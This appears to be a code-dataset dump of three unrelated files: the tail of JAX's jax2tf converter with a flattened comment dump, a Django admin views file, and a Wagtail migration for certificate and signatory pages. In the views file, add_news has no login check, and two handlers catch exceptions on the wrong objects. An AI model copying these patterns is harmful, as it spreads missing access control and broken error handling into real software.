return _convert_jax_impl(lax_control_flow._custom_linear_solve_impl)(
*args,
const_lengths=const_lengths,
jaxprs=jaxprs,
_in_avals=_in_avals,
_out_aval=_out_aval)
tf_impl_with_avals[lax_control_flow.linear_solve_p] = _linear_solve
def _custom_jvp_call_jaxpr(*args: TfVal, fun_jaxpr: core.ClosedJaxpr,
jvp_jaxpr_thunk: Callable,
num_consts: int) -> Sequence[TfVal]:
# TODO(necula): ensure that there is no AD transformation in scope
return _interpret_jaxpr(fun_jaxpr, *args)
tf_impl[custom_derivatives.custom_jvp_call_jaxpr_p] = _custom_jvp_call_jaxpr
def _custom_vjp_call_jaxpr(*args: TfVal, fun_jaxpr: core.ClosedJaxpr,
**_) -> Sequence[TfVal]:
# TODO(necula): ensure that there is no AD transformation in scope
return _interpret_jaxpr(fun_jaxpr, *args)
tf_impl[custom_derivatives.custom_vjp_call_jaxpr_p] = _custom_vjp_call_jaxpr
def _custom_lin(*args: TfVal, **_) -> Sequence[TfVal]:
raise TypeError("can't apply forward-mode autodiff (jvp) to a custom_vjp "
"function.")
tf_impl[ad.custom_lin_p] = _custom_lin
def split_to_logical_devices(tensor: TfVal,
partition_dimensions: pxla.PartitionsOrReplicated):
"""Like TPUMPStrategy.experimental_split_to_logical_devices.
For jax2tf purposes we want to avoid needing to thread the `strategy` object
through the generated computation. It seems that the original function needs
the strategy object only for error checking, which we assume is done upstream
by JAX.
Args:
tensor: Input tensor to annotate.
partition_dimensions: A list of integers, with one integer per tensor
dimension, specifying in how many parts the dimension should be split. The
product of integers must equal the number of devices per replica.
use_sharding_op: whether to use a sharding op, or not.
Returns:
an annotated tensor.
"""
# This corresponds to the sharding annotations in
# xla_bridge._sharding_to_proto.
if partition_dimensions is None:
return xla_sharding.replicate(tensor, use_sharding_op=True)
num_partition_splits = np.prod(partition_dimensions)
tile_assignment = np.arange(num_partition_splits).reshape(
partition_dimensions)
return xla_sharding.tile(tensor, tile_assignment, use_sharding_op=True)
def _sharded_call(f: lu.WrappedFun, vals: Sequence[TfVal],
in_parts: Sequence[pxla.PartitionsOrReplicated],
out_parts_thunk,
**_) -> Sequence[Tuple[TfVal, core.AbstractValue]]:
sharded_vals = util.safe_map(split_to_logical_devices, vals, in_parts)
vals_out = f.call_wrapped(*sharded_vals) # caller handles new_sublevel
out_parts_flat = out_parts_thunk()
assert len(out_parts_flat) == len(
vals_out), f"expected {len(out_parts_flat)} == {len(vals_out)}"
sharded_vals_out = [
(split_to_logical_devices(val, val_part), val_aval)
for (val, val_aval), val_part in util.safe_zip(vals_out, out_parts_flat)
]
return sharded_vals_out
def _sharding_constraint(arg: TfVal, *,
partitions: pxla.PartitionsOrReplicated):
return split_to_logical_devices(arg, partitions)
tf_impl[sharded_jit.sharding_constraint_p] = _sharding_constraint
def _register_checkpoint_pytrees():
"""Registers TF custom container types as pytrees."""
m = tf.Module()
# The types here are automagically changed by TensorFlow's checkpointing
# infrastructure.
m.a = (tf.Module(), tf.Module())
m.b = [tf.Module(), tf.Module()]
m.c = {"a": tf.Module()}
tuple_wrapper = type(m.a)
list_wrapper = type(m.b)
dict_wrapper = type(m.c)
# TF AutoTrackable swaps container types out for wrappers.
assert tuple_wrapper is not tuple
assert list_wrapper is not list
assert dict_wrapper is not dict
jax.tree_util.register_pytree_node(tuple_wrapper, lambda xs:
(tuple(xs), None), lambda _, xs: tuple(xs))
jax.tree_util.register_pytree_node(list_wrapper, lambda xs: (tuple(xs), None),
lambda _, xs: list(xs))
jax.tree_util.register_pytree_node(
dict_wrapper, lambda s: (tuple(s.values()), tuple(s.keys())),
lambda k, xs: dict(zip(k, xs)))
_register_checkpoint_pytrees()
| jax/experimental/jax2tf/jax2tf.py | 99,352 | Trace class that underlies the jax2tf transformation.
We are going to ensure that jax2tf.convert is never nested inside other
transformations. This is sufficient for intended use cases (converting
fully-transformed JAX code). It also simplifies our job because we do not have
to handle situations where we apply primitives on a mix of TF values and
JAX tracers from an outer transformation. E.g., for addition both the TF
values
and the JAX tracers have an override and they get confused if they see values
from the other world.
Hence a TFT trace does not interact with non-TFT traces at lower-level. For
higher-order control-flow primitives we invoke recursively
_interpret_fun on the body of the conditional, which will create a nested TFT.
We do want to allow transformations nested inside a TensorFlowTrace (TFT), but
those will introduce their own MainTrace, and any operations involving those
will be done on those traces, i.e., not a concern for TFT.
Tracer class that boxes a TF value and a JAX abstract value.
In addition to the TF value we carry the JAX abstract value because there are
two cases when it cannot be recovered from the value: (a) when the abstract
value is core.abstract_unit, in which case the value is tf.nan; (b) when we
are converting with polymorphic shapes, in which case the shape of the value
may have dimensions set to `None`, which the JAX abstract value may contain
more precise information.
When the value has a partially-known shape, the dimensions marked as `None`
must correspond to non-constant dimensions in the abstract value.
See README.md for details.
Computes abstract values and a dimension environment for arguments.
Args:
args: the arguments, TF inputs.
polymorphic_shapes: the polymorphic specifications for the arguments.
Returns: a tuple of a sequence of abtract values corresponding to the
arguments and a dimension environment.
Generate a TF shape, possibly containing None for polymorphic dimensions.
Interprets a while_loop with a batched condition.
A batched while has a conditional that returns a tensor of booleans, and
a body that returns a list of tensors whose leading dimensions match those
of the conditional tensor.
We need to turn it into a while with scalar boolean conditional. We will
expand the loop carry to include a prefix with the current tensor boolean
condition. We prepend to the loop the first calculation of the tensor boolean
condition. The loop condition will use a "reduce_any" to calculate a scalar
boolean from the tensor boolean condition. The end of the loop body will
compute the new carry using a "tf.where", and we compute the new tensor
boolean condition.
Implementation of lax.conv_general_dilated_p using XlaConv.
Converts a ConvDimensionNumbers to an XLA ConvolutionDimensionNumbers.
Convert the JAX implementation of a primitive.
Args:
jax_impl: typically the impl-rule for a primitive, with signature
`(*args: JaxVal, **kwargs) -> Sequence[JaxVal]`. This function implements
a primitive in terms of other primitives.
multiple_results: whether `jax_impl` returns a sequence of results.
Returns:
a function with signature `(*args: TfVal, _in_avals, _out_aval, **kwargs)
-> Sequence[TfVal]`.
Implementation of lax.dot_general_p in terms of tf.linalg.einsum.
Tensorflow implementation of gather.
Evaluates a Jaxpr with tf.Tensor arguments.
The output is a sequence of TfVal (no `core.unit`), suitable for use with TF.
Computes bitwise not with support for booleans.
Numpy and JAX support bitwise not for booleans by applying a logical not!
This means that applying bitwise_not yields an unexected result:
jnp.bitwise_not(jnp.array([True, False]))
>> DeviceArray([False, True], dtype=bool)
if you assume that booleans are simply casted to integers.
jnp.bitwise_not(jnp.array([True, False]).astype(np.int32)).astype(bool)
>> DeviceArray([True, True], dtype=bool)
Convert an integer to an XLA.PrecisionConfig.
TensorFlow implementation of reduce_window.
Args:
operand: N dimensional array containing elements of type T
init_value: starting value of the reduction
jaxpr: the jaxpr corresponding to the reduction function
consts: the constants associated with jaxpr.
window_dimensions: array of integers for window dimension values
window_strides: array of integers for window stride values
padding: array of pairs of integers for padding values
base_dilation: array of integers for base dilation values
window_dilation: array of integers for window dilation values
Returns:
The reduced operand.
Registers TF custom container types as pytrees.
Wraps the TensorFlow reduce window operation based on a reducer and an
identity function defining the initial value of the reduction depending on
the dtype of the operand.
Args:
reducer: reduction function of type TfVal -> TfVal -> TfVal
identity: function that takes a TensorFlow dtype as a parameter and returns
the starting value of the reduction.
operand: N dimensional array containing elements of type T
window_dimensions: array of integers for window dimension values
window_strides: array of integers for window stride values
padding: array of pairs of integers for padding values
base_dilation: array of integers for base dilation values
window_dilation: array of integers for window dilation values
name: the name of the specialized reduce window primitive for which this
conversion function is called. This information may help to choose a
different conversion path (optional)
Returns:
The reduced operand.
Called for constants that occur in the program, or for input values to the converted function.
The returned shape may have unknown components, but only when called for
inputs.
Computes bool valued functions using int8.
Transforms `fun` to be executed by TensorFlow.
See
[README](https://github.com/google/jax/blob/master/jax/experimental/jax2tf/README.md)
for more details about usage and common problems.
Args:
fun: Function to be transformed. Its arguments and return value should be
JAX arrays, or nested standard Python containers (tuple/list/dict) thereof
(pytrees).
polymorphic_shapes: Specifies input shapes to be treated polymorphically
during conversion.
.. warning:: The shape-polymorphic conversion is an experimental feature.
It is meant to be sound, but it is known to reject some JAX programs
that are shape polymorphic. The details of this feature can change. It
should be a Python object with the same pytree structure as, or a prefix
of, the tuple of arguments to the function, but with a shape
specification corresponding to each argument. The default value is
`None`, which is a shortcut for a tuple of `None` one for each argument,
denoting that all shapes are monomorphic.
See [how optional parameters are matched to
arguments](https://jax.readthedocs.io/en/latest/pytrees.html#applying-optional-parameters-to-pytrees).
A shape specification for an array argument should be an object
`PolyShape(dim0, dim1, ..., dimn)`
where each `dim` is a dimension specification: a positive integer denoting
a monomorphic dimension of the given size, or a string denoting a
dimension variable assumed to range over non-zero dimension sizes, or
the special placeholder string "_" denoting a monomorphic dimension
whose size is given by the actual argument. As a shortcut, an Ellipsis
suffix in the list of dimension specifications stands for a list of "_"
placeholders. For convenience, a shape specification can also be given
as a string
representation, e.g.: "batch, ...", "batch, height, width, _", possibly
with surrounding parentheses: "(batch, ...)".
The conversion fails if it cannot ensure that the it would produce the same
sequence of TF ops for any non-zero values of the dimension variables.
polymorphic_shapes are only supported for positional arguments; shape
polymorphism is not supported for keyword arguments.
See [the README](https://github.com/google/jax/blob/master/jax/experimental/jax2tf/README.md#shape-polymorphic-conversion)
for more details.
in_shapes: DEPRECATED in favor of `polymorphic_shapes`.
with_gradient: if set, will add a tf.custom_gradient to the converted
function, by converting the ``jax.vjp(fun)``. Only first-order
differentiation is supported for now. If the converted function is saved
in a SavedModel, the custom gradients are currently lost and an error will
be raised if a gradient computation is attempted. This is due to a current
bug in TensorFlow.
enable_xla: if unset, the converter will try harder to use pure TF ops to
convert the function, and raise an error if it can not be converted
without resorting to XLA ops (default: True).
Returns:
A version of `fun` that expects TfVals as arguments (or
tuple/lists/dicts) thereof, and returns TfVals as outputs.
The abstract value for an input.
Lifts a non-Tracer into the TensorFlowTracer.
This function may be called by way of trace.full_raise.
The value may be a core.unit. During JAX transformations we sometimes
produce a Jaxpr that has arguments of abstract value core.abstract_unit
and results equal to core.unit. These are arguments and results that are
not used in the computation.
In TF world, we represent core.unit as NaN. This is safe, as these values
should never be used.
Injects the shape of `x` as an array value.
**Experimental: please give feedback, and expect changes!**
This allows the use of a shape expression as array argument to JAX functions.
A typical example is for implementing a mean operation:
jnp.sum(x) / np.prod(jax2tf.shape_as_value(x))
Like TPUMPStrategy.experimental_split_to_logical_devices.
For jax2tf purposes we want to avoid needing to thread the `strategy` object
through the generated computation. It seems that the original function needs
the strategy object only for error checking, which we assume is done upstream
by JAX.
Args:
tensor: Input tensor to annotate.
partition_dimensions: A list of integers, with one integer per tensor
dimension, specifying in how many parts the dimension should be split. The
product of integers must equal the number of devices per replica.
use_sharding_op: whether to use a sharding op, or not.
Returns:
an annotated tensor.
Experimental module transforms JAX functions to be executed by TensorFlow.
Copyright 2020 Google LLC Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at https://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. type: ignore[import] These don't have public equivalents. pylint: disable=g-direct-tensorflow-import type: ignore[import] type: ignore[import] type: ignore[import] pylint: enable=g-direct-tensorflow-import The scope name need to be a valid TensorFlow name. See https://github.com/tensorflow/tensorflow/blob/r2.3/tensorflow/core/framework/node_def_util.ccL731 A value suitable in a TF tracing context: tf.Tensor, tf.Variable, or Python scalar or numpy.ndarray. (A tf.EagerTensor is a tf.Tensor.) Enum xla_data.PrecisionConfig.Precision Note: this conversion is overkill and just intended as a type check; this code is in principle only run if config.jax_enable_checks is True. TODO: it is not true that this code is run only with jax_enable_checks. The float0 type is not known to TF. The implementation rules for primitives. The rule will be called with the arguments (TfVal) and must return TfVal (or a sequence thereof, if primitive.multiple_results). The vast majority of primitives do not need to worry about core.unit inputs or results. The exception are primarily the control-flow primitives. Some primitive implementation rules need the abstract values of arguments and the results. This is the case for the primitives implemented using _convert_jax_impl and those that need to adjust the shape of the outputs due to missing TF shape inference rules for TFXLA ops. The rules for these primitives should be added to `tf_impl_with_avals`. The abstract value are passed to the implementation as two special kwargs `_in_avals` (a tuple of core.AbstractValue) and `_out_aval` (a core.AbstractValue, or a tuple thereof when primitive.multiple_results). XLA is not linked in all environments; when converting a primitive, if this variable is disabled, we try harder to use only standard TF ops if they are applicable to the concrete use case; if the resulting conversion path ends up requiring a TFXLA operation, an exception is thrown instead. TODO: is there a better way to check if we are inside a transformation? Name input tensors type: ignore This function may take pytrees of TfVals. We can only set tf.custom_gradient on functions that take a flat argument list. Expand the polymorphic_shapes to match the argument pytree Add kwargs shapes. Construct the abstract values for the flat arguments, possibly based on the input shapes and the polymorphic_shapes if given. May create new shape variables. out_tree_thunk() will be the output tree, after running _interpret_fun. Prepare the grad_fn for tf.custom_gradient. One may think that we can get the pullback while we are converting the main function in the first place. That is problematic, because the pullback may contain captured tracers from the conversion of the main function. Those tracers will confuse the conversion of the pullback. So, we construct the vjp anew. type: ignore TODO: enable higher-order gradients We use PreventGradient, which is propagated through a SavedModel. Internals type: ignore We wrap the jax_impl under _interpret_fun to abstract the TF values from jax_impl and turn them into JAX abstract values. The outs may be core.unit, see comment in TensorFlowTrace.pure. type: Sequence[Union[TfVal, core.Unit]] type: ignore tracer type: ignore[attr-defined] May be partially known Must be a numeric value type: ignore[attr-defined] A dimension environment maps dimension variables to TF expressions that compute the value of the dimension. These expressions refer to the TF function arguments. Even if the shape of `arg` is known, we still use `tf.shape` for safety, because the promise is that we will convert the function to work for any value of the dimension. type: ignore[index] TODO: add an assertion tf.shape(arg)[i] == env[d] type: ignore A shape environment maps shape variables to TfVal. type: _ShapeEnv type: ignore[index] return shape_as_value_p.bind(x) TODO: move this to masking or to some common library, if approved shape_as_value_p = core.Primitive("shape_as_value") shape_as_value_p.multiple_results = True def _shape_as_value_impl(x): x_shape = np.shape(x) def dim_to_int(dim: shape_poly.DimSize) -> int: dim_int = _poly_dim_to_tf_dim(dim) if dim_int is None: msg = ("shape_as_value is not implemented for non-constant shapes " "except for masking and jax2tf. " f"Has shape: {x_shape}") raise TypeError(msg) else: return dim_int return tuple(map(dim_to_int, x_shape)) shape_as_value_p.def_impl(_shape_as_value_impl) def _shape_as_value_abstract(x_aval: core.AbstractValue) -> Sequence[core.AbstractValue]: rank = len(x_aval.shape) type: ignore[attr-defined] return (core.ShapedArray((), dtypes.canonicalize_dtype(np.int_), weak_type=True),) * rank shape_as_value_p.def_abstract_eval(_shape_as_value_abstract) def _shape_as_value_translation(comp, x): return xla_client._xla.ops.Tuple(comp, tuple(xb.constant(comp, d) for d in comp.GetShape(x).dimensions())) xla.translations[shape_as_value_p] = _shape_as_value_translation def _shape_as_value_jvp_rule(primals, tangents): The shape does not depend on the contents of the input x, = primals zero = ad.Zero.from_value(0.) return shape_as_value(x), (zero,) * len(x.shape) ad.primitive_jvps[shape_as_value_p] = _shape_as_value_jvp_rule def _shape_as_value__batching_rule(batched_args, batch_dims): xv, = batched_args batch_dim, = batch_dims batch_size = xv.shape[batch_dim] batched_shape = shape_as_value(xv) one_shape = batched_shape[0:batch_dim] + batched_shape[batch_dim+1:] res = tuple(jnp.broadcast_to(d, (batch_size, 1)) for d in one_shape) return res, (0,) * len(one_shape) batching.primitive_batchers[shape_as_value_p] = _shape_as_value__batching_rule def _shape_as_value_masking_rule(operands, operands_logical_shapes): x_logical_shape, = operands_logical_shapes return tuple(x_logical_shape) masking.masking_rules[shape_as_value_p] = _shape_as_value_masking_rule def _shape_as_value_tf(x: TfVal, _in_avals: Sequence[core.AbstractValue], _out_aval: core.AbstractValue) -> TfVal: x_aval = _in_avals[0] def dim_to_tfval(dim: shape_poly.DimSize, dim_idx: int) -> TfVal: dim_int = _poly_dim_to_tf_dim(dim) if dim_int is not None: return tf.convert_to_tensor(dim_int) else: return tf.shape(x)[dim_idx] return tuple(dim_to_tfval(dim, dim_idx) for dim_idx, dim in enumerate(x_aval.shape)) type: ignore[attr-defined] tf_impl_with_avals[shape_as_value_p] = _shape_as_value_tf TODO(b/26854495): pylint doesn't understand slots and inheritance. pylint: disable=assigning-non-slot val: TfVal _aval: core.AbstractValue type: ignore[attr-defined] If JAX does not have x64 bit mode enabled, it will force the 64-bit values to use 32-bit precision. In order to make the TF conversion follow JAX's rules, we cast the TF values down to 32-bit mode. type: ignore[attr-defined] type: ignore[attr-defined] type: ignore[attr-defined] We have a TF value with known shape, and the abstract shape is a shape variable. type: ignore type: ignore Must be a numeric value type: ignore[attr-defined] This would be called when we need to raise a tracer from a lower-level main into the TensorFlowTrace. Since the TensorFlowTrace is never nested inside another transform, there are no lower-level main traces. This is called when we need to raise a tracer from the same master, but a lower sublevel. This could come from a nested jit. type: ignore type: ignore type: ignore Check that the impl rule returned a value of expected shape and dtype TODO: adapt this to match polymorphic shapes type: ignore type: ignore type: ignore type: ignore We encountered a call primitive, e.g., remat_call_p, whose result (out_tracers) include TensorFlowTracer that were not passed through its arguments (captured from the environment). Drop the custom differentiation rule and act like a call primitive. This behavior is desirable because jax2tf stages code out of the JAX system, so there are no more JAX differentiation transformations to be applied. Unused. unreachable assuming jax2tf runs with clean trace state Drop the custom differentiation rule and act like a call primitive. This behavior is desirable because jax2tf stages code out of the JAX system, so there are no more JAX differentiation transformations to be applied. Unused. unreachable assuming jax2tf runs with clean trace state Returns the primitive implementation and whether the implementation takes abstract values (see definition of tf_impl_with_avals) Call primitives are inlined Primitives that are not yet implemented must be explicitly declared here. Not high priority? TF and XLA do not support tf.math.sign for unsigned types. TF and XLA do not support tf.math.abs for unsigned types. Follows the implementation in lax._integer_pow_translation_rule The only dtypes that are allowed are: float32, float64, complex64, and complex128. Some dtypes are unsupported, like uint32, so we just fall back to int32. TODO(mattjj, necula): improve tf.range dtype handling Map from TF signed types to TF unsigned types. Map from TF unsigned types to TF signed types. Note: Bitwise operations only yield identical results on unsigned integers! pylint: disable=protected-access TF shift is "implementation defined" if the shift amount is negative or larger or equal to the size of the value. We implement the XLA semantics to return the shift by the max value (x_bits - 1). TODO: it is likely better to add XlaOps for shifts TF shift is "implementation defined" if the shift amount is negative or larger or equal to the size of the value. We implement the XLA semantics to return 0. TODO: it is likely better to add XlaOps for shifts TF shift is "implementation defined" if the shift amount is negative or larger or equal to the size of the value. We implement the XLA semantics to return 0. TODO: it is likely better to add XlaOps for shifts Return the TF expression for when y is within bounds (0 <= y < |x|) TF does not have comparisons for uint16 and uint32 (despite what the documentation says) The below permits mirroring the behavior of JAX when maxval < minval TODO(bchetioui): this function is not exhaustive wrt which convolution cases can be translated into TF primitives. Further investigation is needed to fully flesh it out. TODO(bchetioui): is there something to do with batch_group_count? TF can only deal with 1D, 2D and 3D convolution TODO(bchetioui): handle different stride cases TODO(bchetioui): in this instance, we can not use padtype_to_pads as string padding is not implemented for transposed convolution. TF only allows 'VALID' and 'SAME' padding TF only allows filters with shape: spatial_filter_shape + [in_channels, out_channels]. In JAX however, rhs_spec is represented as a tuple containing the following: [out_channels, in_channels] + spatial_filter_shape. TF only supports same LHS and output data format Alphabet extracted from the documentation of tf.conv{1,2,3}d TF only supports the following data formats: - [batch_size, in_channels] + input_spatial_shape TODO(bchetioui): TF currently does not support the above on CPU. To avoid failing on this platform, this path is commented out for now. if list(lhs_spec) == list(range(len(lhs_spec))): return "NC" + spatial_dim_alphabet - [batch_size] + input_spatial_shape + [in_channels] TODO(bchetioui): is there a generic way to do a transposed atrous convolution in TensorFlow? This is a non-dilated or atrous convolution TODO(bchetioui): the below path is unreachable for now, as passing a lhs dilation to this function will result in convert_padding returning None systematically. This must be investigated further. Dilation of the LHS is transposed convolution TODO(necula): implement batch_group_count TODO: implement shape inference for XlaConv Follow the lowering for complex convolutions from lax._conv_general_dilated_translation. We can use the same conversion on all platforms because on XLA:TPU the compiler does the same as a rewrite. Convert complex dtype to types used for real and imaginary parts TODO: in presence of None dimensions, XlaDot shape inference returns unknown shape. This condition ensures that: 1) the batch dimensions are ordered in the same way in lhs and rhs (this is not strictly necessary, but we would have to reshape the array if that were not the case; 2) lhs and rhs have the same number of dimensions +/- 1 3) the number of non-batch dimensions in both tensors is either 1 or 2 4) the contracting dimensions are consistent with those of a classic matrix/matrix, vector/matrix or matrix/vector multiplication. All the inputs to tf.linalg.matmul must have 2 inner dimensions, after their batch dimensions, so we need to expand the dimensions appropriately. We can get to this branch with three combinations of inner shapes: - lhs.inner_shape == [a, b], rhs.inner_shape == [b, c] - in this case, the resulting inner shape is [a, c]; - lhs.inner_shape == [b] , rhs.inner_shape == [b, c] - in this case, we need to expand lhs to [1, b], and the resulting shape is [c]. We need to squeeze the result of tf.linalg.matmul as it will have shape [1, c]; - lhs.shape == [batch] + [a, b], rhs.shape == [batch] + [b] - in this case, we need to expand rhs to [b, 1], and the resulting shape is [a]. We need to squeeze the result of tf.linalg.matmul as it will have shape [a, 1]; - lhs.shape == [batch] + [b] , rhs.shape == [batch] + [b] - in this case, we need to expand lhs to [1, b] and rhs to [b, 1], and the resulting shape is (). We need to squeeze the result of tf.linalg.matmul as it will have shape [1, 1]. type: ignore[call-overload] type: ignore[call-overload] type: ignore[call-overload] type: ignore[call-overload] TODO(phawkins): handle axes larger than 2^31. Note: this function follows the pattern in jax.lax._select_and_gather_add_translation. Specializing the function for 64 bits. Only up to 32 bits are supported on TPU, we thus intend to let the code throw a different exception on this platform. Packs two values into a tuple. Unpacks the first element of a tuple. Unpacks the second element of a tuple. TODO: implement shape inference for XlaReduceWindow _try_tf_pool currently only supports reduce_window_max and reduce_window_sum. TODO(bchetioui): this function is not exhaustive wrt which reduce_window_max or reduce_window_sum cases can be translated into a call to max_pool or avg_pool. Further investigation is needed to fully flesh it out. Contrarily to the main path, tf.int8 is actually a valid type for tf.nn.max_pool. TODO(bchetioui): does a simple conversion with another base dilation exist? TODO(bchetioui): does a simple conversion with another window_dilation exist? The whole story seems similar to convolution. ReduceWindow in XLA takes an array of rank N as a parameter, but tf.nn.max_pool / tf.nn.avg_pool take an array of rank N+2, with a default shape of the form [batch_size] + input_spatial_shape + [num_channels] pylint: disable=protected-access pylint: enable=protected-access We use lax_control_flow._cumred_tpu_translation_rule to convert cummax, cummin, cumsum and cumprod. This is efficient on TPU, but the complexity is O(n^2) on other backends. This may be implemented using associative_scan instead to favor different backends. TODO(bchetioui): cumsum and cumprod can be converted using pure TF ops for certain dtypes: bfloat16, float16, float32, float64, and int32. Other dtypes will fail when running in compiled mode, but are otherwise compatible with the operation. A non-XLA path can thus be defined for all dtypes, though the tests will crash. Use the vmap implementation, otherwise on TPU the performance is really bad With use_vmap=True on, we get about the same performance for JAX and jax2tf. TODO(b/184503314): improve shape inference for __getitem__ Here we could use tf.slice. Similarly, for lax.gather we can sometimes use tf.gather. But those have different semantics for index-out-of-bounds than JAX (and XLA). We have tried to force compilation, by wrapping into tf.xla.experimental.compile, or tf.function(jit_compile=True), but those solutions are brittle because they do not work when nested into an outer compilation (see b/162814494 and b/163006262). They also do not survive well being put in a SavedModel. Hence, we now use TFXLA slicing and gather ops. TODO: implement shape inference for XlaDynamicSlice TODO: implement shape analysis for XlaScatter tf.cond needs lambdas with no arguments. type: ignore[attr-defined] The conditional is not a scalar, this must be a batched while The conditional must return a single value to TF Initial computation of batched condition We use the scan impl rule to rewrite in terms of while. Some types originally incompatible with tf.math.top_k can be promoted to a compatible type without loss of precision. The comparator is a 2N-argument TF function, with arguments [2k] and [2k +1] corresponding to two scalars from operand[k]. We build a comparison: arg[0] < arg[1] or (arg[0] == arg[1] and (arg[2] < arg[3] or ...)) all the way to arg[2 * num_keys - 2] < arg[2 * num_keys - 1] Use the same comparator that JAX uses when compiling to XLA, to get the proper NaN/Inf total order, and the lexicographic ordering. The comparator is a 2N-argument TF function, with arguments [2k] and [2k +1] corresponding to two scalars from operand[k]. TODO(bchetioui): didn't find a 100% reliable, easy and satisfying way to sort the left eigenvectors in the right order. The jax.numpy.linalg API suggests to me that left eigenvectors are anyway seldom used, so I think it is acceptable to leave as unimplemented for now. compute_left_eigenvectors == True adjoint == transpose for real dtypes, so special care need only be taken for complex types. TODO(necula): ensure that there is no AD transformation in scope TODO(necula): ensure that there is no AD transformation in scope This corresponds to the sharding annotations in xla_bridge._sharding_to_proto. caller handles new_sublevel The types here are automagically changed by TensorFlow's checkpointing infrastructure. TF AutoTrackable swaps container types out for wrappers. | 29,260 | en | 0.780508 |
from django.contrib.auth.decorators import login_required
from django.shortcuts import render, get_object_or_404, redirect
from django.template import loader
from django.http import HttpResponse
from django import template
from mainsite.forms import NewsCreate
from mainsite.models import News, ContactForm, Issue
@login_required(login_url="/admin-panel/login/")
def index(request):
context = {}
context['segment'] = 'index'
html_template = loader.get_template('index.html')
return HttpResponse(html_template.render(context, request))
@login_required(login_url="/admin-panel/login/")
def profile(request):
context = {}
context['segment'] = 'profile'
html_template = loader.get_template('page-user.html')
return HttpResponse(html_template.render(context, request))
@login_required(login_url="/admin-panel/login/")
def news(request):
list = News.objects.all()
context = {"list": list}
context['segment'] = 'news'
html_template = loader.get_template('news.html')
return HttpResponse(html_template.render(context, request))
def add_news(request):
upload = NewsCreate()
if request.method == 'POST':
upload = NewsCreate(request.POST, request.FILES)
if upload.is_valid():
upload.save()
return redirect('/admin-panel/news')
else:
return HttpResponse(
"""your form is wrong, reload on <a href = "{{ url : '/admin-panel/news'}}">reload</a>""")
else:
context = {
"upload_form": upload,
"action": "Добавить"
}
return render(request, 'add-news.html', context)
@login_required(login_url="/admin-panel/login/")
def update_news(request, news_id: int):
try:
news_sel = News.objects.get(pk=news_id)
except news.DoesNotExist:
return redirect('/admin-panel/news')
news_form = NewsCreate(request.POST, request.FILES or None, instance=news_sel)
if news_form.is_valid():
news_form.save()
return redirect('/admin-panel/news')
context = {
"ProductForm": news_form,
"ProductModel": news_sel,
"action": "Обновить"
}
return render(request, 'add-news.html', context)
@login_required(login_url="/admin-panel/login/")
def delete_news(request, news_id):
news_id = int(news_id)
try:
news_sel = News.objects.get(pk=news_id)
except news_id.DoesNotExist:
return redirect('/admin-panel/news')
news_sel.delete()
return redirect('/admin-panel/news')
@login_required(login_url="/admin-panel/login/")
def contactforms(request):
list = ContactForm.objects.all()
context = {"list": list}
context['segment'] = 'contactforms'
html_template = loader.get_template('contact-forms.html')
return HttpResponse(html_template.render(context, request))
@login_required(login_url="/admin-panel/login/")
def requests(request):
list = Issue.objects.all()
context = {"list": list}
context['segment'] = 'requests'
html_template = loader.get_template('requests.html')
return HttpResponse(html_template.render(context, request))
@login_required(login_url="/admin-panel/login/")
def delete_contact_form(request, contact_id):
contact_id = int(contact_id)
try:
contact_sel = ContactForm.objects.get(pk=contact_id)
except contact_id.DoesNotExist:
return redirect('/admin-panel/contacts')
contact_sel.delete()
return redirect('/admin-panel/contacts')
@login_required(login_url="/admin-panel/login/")
def pages(request):
context = {}
# All resource paths end in .html.
# Pick out the html file name from the url. And load that template.
try:
load_template = request.path.split('/')[-1]
context['segment'] = load_template
html_template = loader.get_template(load_template)
return HttpResponse(html_template.render(context, request))
except template.TemplateDoesNotExist:
html_template = loader.get_template('page-404.html')
return HttpResponse(html_template.render(context, request))
except:
html_template = loader.get_template('page-500.html')
return HttpResponse(html_template.render(context, request))
| app/views.py | 4,252 | All resource paths end in .html. Pick out the html file name from the url. And load that template. | 98 | en | 0.812652 |
# Generated by Django 2.2.3 on 2019-08-07 13:29
from django.db import migrations, models
import django.db.models.deletion
import wagtail.core.blocks
import wagtail.core.fields
class Migration(migrations.Migration):
dependencies = [
("wagtailimages", "0001_squashed_0021"),
("wagtailcore", "0041_group_collection_permissions_verbose_name_plural"),
("cms", "0040_whoshouldenrollpage_heading"),
]
operations = [
migrations.CreateModel(
name="CertificatePage",
fields=[
(
"page_ptr",
models.OneToOneField(
auto_created=True,
on_delete=django.db.models.deletion.CASCADE,
parent_link=True,
primary_key=True,
serialize=False,
to="wagtailcore.Page",
),
),
(
"product_name",
models.CharField(
help_text="Specify the course/program name.", max_length=250
),
),
(
"CEUs",
models.CharField(
blank=True,
help_text="Optional text field for CEU (continuing education unit).",
max_length=250,
null=True,
),
),
(
"signatories",
wagtail.core.fields.StreamField(
[
(
"signatory",
wagtail.core.blocks.PageChooserBlock(
page_type=["cms.SignatoryPage"], required=True
),
)
],
help_text="You can choose upto 5 signatories.",
),
),
],
options={"verbose_name": "Certificate"},
bases=("wagtailcore.page",),
),
migrations.CreateModel(
name="SignatoryIndexPage",
fields=[
(
"page_ptr",
models.OneToOneField(
auto_created=True,
on_delete=django.db.models.deletion.CASCADE,
parent_link=True,
primary_key=True,
serialize=False,
to="wagtailcore.Page",
),
)
],
options={"abstract": False},
bases=("wagtailcore.page",),
),
migrations.CreateModel(
name="SignatoryPage",
fields=[
(
"page_ptr",
models.OneToOneField(
auto_created=True,
on_delete=django.db.models.deletion.CASCADE,
parent_link=True,
primary_key=True,
serialize=False,
to="wagtailcore.Page",
),
),
(
"name",
models.CharField(
help_text="Name of the signatory.", max_length=250
),
),
(
"title_1",
models.CharField(
blank=True,
help_text="Specify signatory first title in organization.",
max_length=250,
null=True,
),
),
(
"title_2",
models.CharField(
blank=True,
help_text="Specify signatory second title in organization.",
max_length=250,
null=True,
),
),
(
"organization",
models.CharField(
blank=True,
help_text="Specify the organization of signatory.",
max_length=250,
null=True,
),
),
(
"signature_image",
models.ForeignKey(
blank=True,
help_text="Signature image size must be at least 150x50 pixels.",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to="wagtailimages.Image",
),
),
],
options={"verbose_name": "Signatory"},
bases=("wagtailcore.page",),
),
]
